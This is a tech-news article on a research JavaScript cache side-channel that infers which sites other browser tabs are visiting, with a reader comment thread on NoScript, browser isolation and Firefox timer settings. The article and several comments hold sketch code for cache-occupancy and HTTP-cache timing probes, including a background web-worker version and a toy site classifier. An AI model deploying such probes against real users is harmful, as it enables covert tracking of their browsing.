Talk about a cache flow problem: This JavaScript can snoop on other browser tabs to work out what you're visiting

Computer science boffins have demonstrated a side-channel attack technique that bypasses recently-introduced privacy defenses, and makes even the Tor browser subject to tracking. The result: it is possible for malicious JavaScript in one web browser tab to spy on other open tabs, and work out which websites you're visiting. …
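
For the curious, the flavour of probe the researchers describe works roughly like this: repeatedly sweep a buffer larger than the last-level cache and time each sweep; activity in other tabs (or other browsers) evicts the attacker's data and shows up as slower sweeps, and the resulting trace is what gets classified. A minimal JavaScript sketch, with illustrative sizes and made-up names rather than anything taken from the paper:

// Illustrative sketch only: a cache-occupancy probe of the kind described above.
const BUF_BYTES = 8 * 1024 * 1024;   // assumed to exceed the last-level cache
const LINE = 64;                     // typical cache-line size
const buf = new Uint8Array(BUF_BYTES);

function sweepOnce() {
  // Touch one byte per cache line; the sweep time reflects how much of the
  // cache is currently occupied by other tabs/processes.
  let sink = 0;
  const t0 = performance.now();
  for (let i = 0; i < BUF_BYTES; i += LINE) sink += buf[i];
  return performance.now() - t0;
}

function collectTrace(samples) {
  const trace = [];
  for (let i = 0; i < samples; i++) trace.push(sweepOnce());
  return trace;   // this timing trace is what a classifier would be fed
}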

  1. Pascal Monett Silver badge
    FAIL

    "it is possible for malicious JavaScript in one web browser tab to spy on other open tabs"

    Not with NoScript it isn't.

    1. sabroni Silver badge

      Re: Not with NoScript it isn't.

      Most of us use NoScript to selectively run scripts from some domains and not from others; otherwise we'd just turn JS off for the whole browser and be done.

      So it depends which domain hosts the malicious JS.

      1. Pascal Monett Silver badge

        I'm supposing that those of us who do run NoScript will be trusting domains that do not serve as hosts for malicious scripts.

        1. Anonymous Coward
          Anonymous Coward

          Ah Pascal, you are an innocent ... keep hoping that it will all work out OK in the end ... it might.

          1. Fruit and Nutcase Silver badge
            Joke

            @AC, Pascal Monett

            Ah Pascal

            Did you mean Oh! Pascal!

        2. bombastic bob Silver badge
          Devil

          actually, I run noscript, ONLY allow a very small number of domains, and if a web site is persistent and for some reason I _must_ use it, I do the following:

          su - differentuser

          export DISPLAY=localhost:0.0

          firefox &

          then the firefox settings for 'differentuser' are:

          a) dump all history on exit

          b) allow script anyway

          c) don't keep login information in the browser's settings either

          then paste the URL into the "other user" browser, and run as usual. expect longer delays [loading all of that scripty crap and no cache]. When done, exit the browser, kinda like flushing the toilet when you're done with "whatever".

          (NOTE: you'll need to allow TCP for X11 and NOT be running windows for this to work; windows may alternately let you use 'run as user' with firefox for a similar effect, but I haven't tried it, and I always recommend to NOT run a web browser and surf the web in windows, ESPECIALLY not a user with admin privs)

          secondary point: to allow TCP on an X server these days, you may need to set up your system for "multi-user" (i.e. don't boot into the GUI 'gdm' etc. and use 'startx') and have a '~/.xserverrc' file that looks like this:

          exec Xorg -listen tcp

          then make sure you block port 6000 at the firewall, so nobody else tries to connect to you. Also will need to execute "xhost +localhost" so that the 'export DISPLAY=' trick will work

          1. Cavehomme_

            No Script = No Internet

            “su - differentuser

            export DISPLAY=localhost:0”

            Yep, you’ll get far with Jo Public with that workaround. Easier still, break their internet experience for them by using NoScript with no exclusions.

            Everyone who doesn't frig around with IT, i.e. the 99%, has no option but to rely upon their security software to do the job.

      2. JohnFen

        Re: Not with NoScript it isn't.

        The way I use NoScript is that I disallow all Javascript by default. Then, if needed, I'll selectively allow specific scripts. No site gets blanket permission to run any and all scripts they want.

        1. Anonymous Coward
          Anonymous Coward

          Re: Not with NoScript it isn't.

          But the script in question can simply be attached to or be a part of one of those "needed to run the site" scripts. Hard to defeat "piggyback" scripts without breaking sites you frequent. Unless and until there's a mandate to make websites as simple as possible (over and against the objections of John Q. Public), this will continue. Indeed, JavaScript can simply be one means. The big big reveal is that it's possible to identify your action through broad things accessible to the average user (CPU and cache utilization) in a way that can nail down the browser perhaps even while other things are going on (meaning it can filter noise). Perhaps the next step will be to find a way to snoop that can't be shut off; then it's decision time for those who can't afford or logistically use more than one computer.
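
          To make the "broad things accessible to the average user" point concrete: the probe doesn't even need the attacking page to be in the foreground or on the main thread. A hypothetical sketch (all names and numbers invented) of the same kind of measurement running from a web worker:

          // Illustrative only: keep sampling cache-sweep times from a background worker.
          const workerSrc = `
            const BUF = new Uint8Array(8 * 1024 * 1024);   // assumed larger than the LLC
            setInterval(() => {
              let sink = 0;
              const t0 = performance.now();
              for (let i = 0; i < BUF.length; i += 64) sink += BUF[i];
              postMessage(performance.now() - t0);         // one sample of the trace
            }, 10);
          `;
          const blob = new Blob([workerSrc], { type: 'text/javascript' });
          const probe = new Worker(URL.createObjectURL(blob));
          probe.onmessage = (e) => {
            // e.data is one sweep time in ms; append it to whatever trace is being recorded
          };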

          1. ElReg!comments!Pierre

            Re: Not with NoScript it isn't. @AC

            As I understand it, the authors dismiss the "other things [...] going on" because the browser uses a large proportion of resources, and the noise is "filtered" because "deep learning" (which would in most cases eliminate basic, predictable system activity). One of the problems, in my view, is that this "broad" approach is unlikely to work if there is significant unpredictable system activity going on at the same time (say, you're retrieving your mail via Claws Mail while loading the page).

            Also, even if 'net browsing is the only thing going on, I wonder how well the technique works when tab number increases. I'm guessing "not well at all". My 2 primary uses for tabbed browsing are comics binge-reading, and wide-scope documentation. In both cases I often have 10+ tabs loading at the same time, good luck with that, cache-lurkers. (Well of course I don't allow JS to begin with because I like resource frugality -and not because I have shitty slow 'puters, as some may malignantly suggest- but that's beside the point)

            1. jelabarre59

              Re: Not with NoScript it isn't. @AC

              "I wonder how well the technique works when tab number increases. I'm guessing "not well at all". My 2 primary uses for tabbed browsing are comics binge-reading, and wide-scope documentation. In both cases I often have 10+ tabs loading at the same time, good luck with that, cache-lurkers"

              Yeah, I should probably do "secure" browsing while I'm visiting TVTropes. I'll have 15 or 20 tabs open by then (at minimum).

              1. ElReg!comments!Pierre
                Pint

                Re: Not with NoScript it isn't. @AC

                The brand is "security by WTFizzatshitRuserious"

  2. macjules
    IT Angle

    "Computer science boffins"

    You make it sound as though there are scientists in a laboratory wearing white coats and peering at oscilloscopes à la 1970s Open University programmes.

    1. sabroni Silver badge
      Happy

      Re: "Computer science boffins"

      New here?

    2. Giovani Tapini

      Re: "Computer science boffins"

      You mean that is not the case?

      1. big_D Silver badge

        Re: "Computer science boffins"

        No, they wear kipper ties, flannel shirts and flared corduroy trousers. When it is cold, tweed jackets with leather patches on the elbows.

        A pipe and a perm are also usually a prerequisite, the latter at least among the more hirsute, otherwise a brushover is recommended.

        1. big_D Silver badge

          Re: "Computer science boffins"

          they wear... :-S

      2. bombastic bob Silver badge
        Trollface

        Re: "Computer science boffins"

        oops I forgot to hook my o-scope up to my computer...

    3. Anonymous Coward
      Anonymous Coward

      Re: "Computer science boffins"

      It also sounds as if they regularly boff their always beautiful lab assistants. And there are at least 2 things wrong in that sentence.

  3. Dom De Vitto

    Ermmmm, been this way forever?

    This is literally a cute way to do something you could always do.

    Load an object and compare load/compile/execute times to determine whether it had to be downloaded or was already cached.

    Bucketing the cache per "requester site" would resolve this, but also impact performance.

    The real impact here is when you consider iterating through a graph of social media to find a particular person's profile using basic set theory, and finally iterating over the short list of people who've seen the recent posts from DUP Supporters, UK Parliament News and LGBT weekly.
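
    For reference, the long-standing "was it already downloaded?" trick described above looks roughly like this (the URL is a placeholder and the threshold is entirely illustrative; per-site cache bucketing is precisely what defeats it):

    // Illustrative sketch of classic HTTP-cache timing, not the technique in the article.
    function probeCached(url) {
      return new Promise((resolve) => {
        const img = new Image();
        const t0 = performance.now();
        img.onload = img.onerror = () => {
          const dt = performance.now() - t0;
          // A load that completes within a few milliseconds was very likely
          // served from the browser cache rather than the network.
          resolve({ url, ms: dt, probablyCached: dt < 5 });
        };
        img.src = url;
      });
    }

    probeCached('https://example.com/some-resource.png').then(console.log);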

    1. diodesign (Written by Reg staff) Silver badge

      Re: Ermmmm, been this way forever?

      This is using the CPU cache to fingerprint pages from their memory accesses. It's a new technique for spying on browser tabs, something that has been done before by other means.

      C.

      1. This post has been deleted by its author

  4. Anonymous Coward
    Anonymous Coward

    about:config

    "Mozilla said it would disable or reduce the precision of time sources in its Firefox browser."

    privacy.resistFingerprinting.reduceTimerPrecision.microseconds

    privacy.resistFingerprinting.reduceTimerPrecision.jitter

    privacy.reduceTimerPrecision
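
    A quick way to see what coarsening the timer actually does is to measure the smallest non-zero step performance.now() will report; a minimal sketch (the value you get depends on the browser version and on the preferences above):

    // Illustrative: report the effective granularity of performance.now().
    function timerGranularityMs(iterations = 100000) {
      let minStep = Infinity;
      let prev = performance.now();
      for (let i = 0; i < iterations; i++) {
        const now = performance.now();
        const step = now - prev;
        if (step > 0 && step < minStep) minStep = step;
        prev = now;
      }
      return minStep;   // coarser values make fine-grained cache timing harder
    }

    console.log('observed timer granularity (ms):', timerGranularityMs());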

    1. Anonymous Coward
      Anonymous Coward

      Re: about:config

      And:

      privacy.resistFingerprinting must be set to TRUE.

      1. veti Silver badge

        Re: about:config

        Well, problem sorted then. I don't see how you could be more intuitive than that.

        </sarcasm>

  5. Pen-y-gors

    It should only take 10 minutes to negotiate a fix for this

    Well, possibly a little more.

    But shirley there are a number of defences and browser fixes possible?

    It would have an efficiency hit, but could the browser do a bit of random cache grabbing all the time, so the pattern is unpredictable (see the sketch after this comment)? There are enough delays in loading and rendering a page these days that there is ample spare time to play around.

    And does this attack work cross browser, so could you defend by using Chrome for the stuff you don't care about ('cos Google is snooping on everything anyway) and then say, Firefox in private mode for the banking site?
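
    For what it's worth, the "random cache grabbing" idea suggested above might look something like the sketch below; purely illustrative, not a vetted defence, and it would cost CPU and battery:

    // Illustrative noise generator: touch random cache lines at random intervals
    // so any occupancy trace recorded by another tab is harder to classify.
    const NOISE_BYTES = 8 * 1024 * 1024;
    const noiseBuf = new Uint8Array(NOISE_BYTES);

    function cacheNoiseBurst(touches = 20000) {
      let sink = 0;
      for (let i = 0; i < touches; i++) {
        sink += noiseBuf[(Math.random() * NOISE_BYTES) | 0];
      }
      return sink;
    }

    (function scheduleNoise() {
      cacheNoiseBurst();
      setTimeout(scheduleNoise, 50 + Math.random() * 200);   // unpredictable cadence
    })();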

    1. ElReg!comments!Pierre

      Re: It should only take 10 minutes to negotiate a fix for this

      They're fingerprinting the processor cache, so the script would "detect" a page loading in another browser (whether it could identify it rather depends on how the browsers load pages and how the fingerprint database was constructed).

      The aim for this technique would not be to construct a map of every website you visit, as their "open world" setup shows. Rather, it would seek to determine if you are visiting a "sensitive" website, and as such are overdue for a friendly chat in the back of an unmarked van.
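
      To make the "fingerprint database" idea concrete: the paper uses deep-learning classifiers, but a toy nearest-neighbour comparison against made-up reference traces shows the shape of the matching step:

      // Toy illustration only; the reference data and distance metric are invented.
      function distance(a, b) {
        let sum = 0;
        const n = Math.min(a.length, b.length);
        for (let i = 0; i < n; i++) {
          const d = a[i] - b[i];
          sum += d * d;
        }
        return Math.sqrt(sum);
      }

      function closestSite(trace, fingerprints) {
        let best = { site: null, dist: Infinity };
        for (const [site, ref] of Object.entries(fingerprints)) {
          const d = distance(trace, ref);
          if (d < best.dist) best = { site, dist: d };
        }
        return best;
      }

      // Hypothetical reference sweep-time traces (ms) and one fresh measurement:
      const db = { 'news-site': [2.1, 2.3, 4.8, 4.9], 'video-site': [5.0, 5.2, 5.1, 5.3] };
      console.log(closestSite([4.9, 5.1, 5.0, 5.2], db));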

  6. tiggity Silver badge

    JS - just for a change

    ". Disabling JavaScript completely will kill off the attack, but also kill off a lot of websites, which rely on JS functionality to work"

    problem is most sites which "rely on JS", use it for functionality that could be achieved without JS: either eye-candy bells and whistles (plenty of which could be done via CSS) or JS calls to dynamically fetch content (instead of it all being served from the server), which basically puts more workload on the user's browser (and their bandwidth) and less on the server.

    JS is too often the lazy option.

    Instead of Chrome et al. being focused on non-HTTPS warnings, it would be good if they warned about JS use (given Google are a big JS-abuse miscreant, I'm not holding my breath)

    1. Bod

      Re: JS - just for a change

      Let's go back to static pages where you have to keep clicking next page to scroll through thousands of items instead of dynamically loading them then.

      Back to Web 1.0

      1. Zolko Silver badge

        Re: JS - just for a change

        @Bod : "Let's go back to static pages [...] Back to Web 1.0"

        well, if you're using Tor, then it's for privacy reasons, so it is probably a very strange idea to browse with JS enabled AND have multiple tabs opened visiting different and sensitive sites. For example I use a different browser for banking than for regular reading, and I use the banking browser only for that, with JS enabled since they need it.

      2. JohnFen

        Re: JS - just for a change

        "Let's go back to static pages where you have to keep clicking next page to scroll through thousands of items instead of dynamically loading them then."

        For this particular example, I really, really wish that sites would go back to behaving that way. Dynamic loading is something that gets in my way on a daily basis.

      3. bombastic bob Silver badge
        Stop

        Re: JS - just for a change

        "Back to Web 1.0"

        preferable to the bandwidth wasting script intensive bell-whistle-new-shiny market-platform track-via-ads bright blue on blinding white 2D FLATTY "shit show" we're exposed to on a daily basis.

        yeah, been here a LONG time. You can make things look good without cat video ads playing in every corner of the page.

    2. Shadow Systems

      Re: JS - just for a change

      At Tiggity, I just turn off JS entirely. If a site refuses to load because of it, then I do a search for "cache: $URL" to get a plain text version of the page & read the content anyway. A site can whinge about cookie policies & JS requirements all they want, I'm not agreeing to (nor allowing) either "requirement". If I can access my (new! WOOHOO!) bank's site without JS enabled then a simple news site can jolly-well cough up their content without it either.

      At Bod, you speak of returning to HTML 1.0 as if it were a BAD thing. Given how much shit everything newer keeps introducing into the mix, which site builders then use to fuck with us, I'd say pruning said bits out with a chainsaw & extreme prejudice is a GOOD thing. So what if you have to click Next to get more content; at least then you don't have to worry if the JS they're using to serve up such pages is about to deliver a virus instead.

      I realize & accept that I'm a luddite in this regard, but then maybe my "luddite paranoia" has grounds given all the shit being flung at us in the hopes that some of it sticks. =-(

      1. bombastic bob Silver badge
        Pint

        Re: JS - just for a change

        "do a search for 'cache: $URL' to get a plain text version of the page & read the content anyway."

        see icon

    3. JohnFen

      Re: JS - just for a change

      "problem is most sites which "rely on JS", use it for functionality that could be achieved without JS"

      Yep. And well-designed sites will continue to work properly even if they can't run scripts in the browser -- they just drop the bells and whistles (which, half of the time, makes the web site faster and easier to use anyway).

      My standard practice is that if a site doesn't work properly without Javascript, then I just don't use the site. There are very, very few websites which are actually indispensable.

    4. bombastic bob Silver badge
      Devil

      Re: JS - just for a change

      "problem is most sites which "rely on JS", use it for functionality that could be achieved without JS"

      The WORST ones send back an error from nginx - some CDN out there uses javascript to load their pages, and when the load/redirect (via script) fails, you see that 'FORBIDDEN' error from nginx.

      It's a filter that KEEPS ME FROM USING THAT WEB SITE. I'll go elsewhere, and flame them every chance I can, for doing that. [if it's a web site rental, I'll ask the owner nicely to use a different service provider, with a nice easily understood explanation as to why]

      /me considers a javascript in some of my pages that loads the "you are an idiot" flash, infinite instances of it. So if script is OFF, you are fine. If you enable it, "you are an idiot, ha ha-ha ha ha ha ha ha ha ha haaa!" with a rapidly growing number of instances filling your screen. It'd also be an 'idiot detector' for people who still have flash player enabled.

    5. veti Silver badge

      Re: JS - just for a change

      "JS is too often the lazy option."

      Well, yes. But saying why it gets used does not really get us any closer to preventing its misuse.

      Whatever the reason, the fact is it's very, very widely used, and you can't simply turn it off without breaking a (very) large part of the web we have now.

      It would be more helpful to identify the specific JS functions that are used in this attack, and how they could be rewritten or redacted entirely to suppress it.

      1. JohnFen

        Re: JS - just for a change

        "Whatever the reason, the fact is it's very, very widely used, and you can't simply turn it off without breaking a (very) large part of the web we have now."

        Fine by me -- that's what I've been doing for years anyway. Sites that are so poorly designed that they can't run without Javascript are sites that are so poorly designed that they don't deserve my attention.

        "It would be more helpful to identify the specific JS functions that are used in this attack, and how they could be rewritten or redacted entirely to suppress it."

        But that would only plug this one specific hole without addressing the underlying problem that scripts have entirely too much access to your browser and computer to be considered generally safe.

        1. Charles 9

          Re: JS - just for a change

          "Fine by me -- that's what I've been doing for years anyway. Sites that are so poorly designed that they can't run without Javascript are sites that are so poorly designed that they don't deserve my attention."

          Problem is, what if it's the ONLY way to access your money (because it's your bank, for which there are no local branches of ANY bank within a reasonable drive--and no, EVERY employer is forced to direct deposit for tax reasons--those who don't tend to get sniffed by la migra)?

    6. FlamingDeath Silver badge
      Boffin

      Re: JS - just for a change

      I have a policy: if some douchebag web developer can't be bothered to make a website at least partially functional without javascript and I am presented with a white page, I leave and go elsewhere.

      I recommend others do the same

  7. Steve Graham

    The "fingerprinting" depends on every browser requesting identical data from the site. If your ad-blocker and script-blocker stop your browser from requesting some of it, the fingerprint becomes blurry.

    1. Deckard_C

      Might that not be the reverse? Stopping the ever-changing ads will make the site more predictable, provided they have fingerprinted the site with ads blocked as well.

    2. ElReg!comments!Pierre

      It also relies on connection speed, browser brand and version, websites staying the same over time (the attacker needs to build a fingerprint database), and overall resource consumption. As such, it might achieve 70% accuracy in a lab setup with a limited set of fixed pages, constant and known connection speed, known browser and no other system activity, but I can't see it working in the real world.

  8. Version 1.0 Silver badge

    Welcome to the 21st century

    No big surprise here - this is the way that the world works these days. No worries the bug can be fixed^H^H^H^H^H moved somewhere else.

  9. bazza Silver badge

    Practising Safe Hex

    Yet another reason why running random, unattributed, dunno-where-it-came-from, I'm-sure-it'll-be-OK-really code off the Internet is a bad idea.

    One day this is going to reach a point where it's indefensible for companies like Google to persist with Javascript as a technology. Many, including myself, think we're already there, and have been for quite some time...

    Interesting to think that the large tech companies are effectively one major browser breach away from unrecoverable reputational damage. That's a risk that they cannot wholly control - people use their browsers for more than just accessing (for example) Google services, and those other sites are potentially able to attack the security of Google's services without Google being able to control or even detect that.

    Not that the old fashioned way was inherently secure - people got software nasties through dodgy shareware, USB sticks, all sorts of vectors. But at least with those you were knowingly installing that software, or plugging in that free USB stick, or connecting to that public network with file sharing enabled, etc. Nowadays just a little light web browsing to even perfectly standard websites can result in someone somewhere getting code running on your machine, and hijacking your data.

    1. vtcodger Silver badge

      Re: Practising Safe Hex

      "One day this is going to reach a point where it's indefensible for companies like Google to persist with Javascript as a technology"

      I truly hope you are right, since running arbitrary code provided by poorly controlled third parties is obviously a REALLY BAD idea from a security POV. But the fact that it's a bad idea doesn't seem to have much impact on Web Developers. (As an internet user, Web Developers are not my favorite people). There's also the fact that a lot of sites that deal with maps or text editing or such actually need scripting unless and until alternate approaches can be developed.

      My guess is that if things get bad enough, there will eventually, in the face of much protesting, be a ban on running third party scripts. I have my doubts that'll work well enough to provide us users with adequate security. And it will cause a lot of short term problems. But it would certainly be a step in the right direction.

      Time will tell.

      1. JohnFen

        Re: Practising Safe Hex

        "As an internet user, Web Developers are not my favorite people"

        You and me both. But I hold even more antipathy towards those awful "UX" people. Of course, there is a lot of overlap in the Venn diagram of those two groups.

    2. bombastic bob Silver badge
      Devil

      Re: Practising Safe Hex

      I've been calling it "Safe Surfing" for a while. It includes things like:

      a) don't use internet explorer or Edge or MS Outlook [aka virus outbreak]

      b) don't be logged in with admin credentials for e-mail or web surfing

      c) if possible, don't use windows to surf the web or read e-mail

      d) run noscript or its equivalent

      e) only (pre)view e-mail in plain text, NEVER with attachments inline

      f) always save attachments to disk, then open with "the application" (not double-click) by running the application FIRST and then using 'file open', and have SCRIPTING TURNED OFF when you do it.

      etc.

  10. Charlie Clark Silver badge

    Claims of spying are overblown

    "We show that we can spy from one browser tab on another and even from one browser on other browsers running on the computer."

    Not really. The technique can detect which sites may have been visited with reasonable accuracy. That's enough for some degree of profiling but it's a long way from spying. And it relies on the really paranoid using multiple tabs and keeping the browsers open.

    If I was really paranoid I suspect I'd disable tabs and possibly even run each browser instance in a VM.

    1. JohnFen

      Re: Claims of spying are overblown

      "If I was really paranoid I suspect I'd disable tabs and possilby even run each browser instance in a VM"

      I guess that I'm half-paranoid. I am not really a user of tabs in the first place (not for security reasons, but because I find it better from a usability standpoint to run multiple instances of a browser rather than having a bunch of tabs in a single instance), but if I have to use a site that doesn't function without allowing Javascript, I always do that from inside a VM.
